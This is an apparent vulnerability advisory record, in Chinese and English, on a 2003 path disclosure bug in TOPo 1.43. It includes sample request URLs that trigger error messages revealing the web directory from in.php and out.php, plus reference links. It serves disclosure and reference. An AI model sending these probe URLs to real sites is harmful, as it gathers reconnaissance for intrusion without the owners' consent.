https://www.exploit-db.com/exploits/22222
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-208

TOPo1.43版本存在漏洞。远程攻击者可以通过发送带有（1）in.php或（2）out.php无效参数的HTTP请求获取敏感信息，该漏洞可能在错误消息中泄露TOPo目录的路径。

source: http://www.securityfocus.com/bid/6768/info

It has been reported that TOPo may return information to users that is sensitive in nature. Under some circumstances, it is possible to produce an error message that reveals information about web directory structure. This could result in more organized attack against system resources.

http://www.example.com/[top_path]/in.php?
http://www.example.com/[top_path]/out.php?
http://www.example.com/[top_path]/in.php?id=any_word
http://www.example.com/[top_path]/out.php?id=any_word
http://www.example.com/[top_path]/in.php?any_word
http://www.example.com/[top_path]/out.php?any_word

来源:BUGTRAQ
名称:20030204TOPo1.43andprior-PathDisclosure(in.php,out.php)
链接:http://archives.neohapsis.com/archives/bugtraq/2003-02/0049.html
来源:XF
名称:topo-path-disclosure(11248)
链接:http://xforce.iss.net/xforce/xfdb/11248
来源:BID
名称:6768
链接:http://www.securityfocus.com/bid/6768
来源:SECUNIA
名称:8008
链接:http://secunia.com/advisories/8008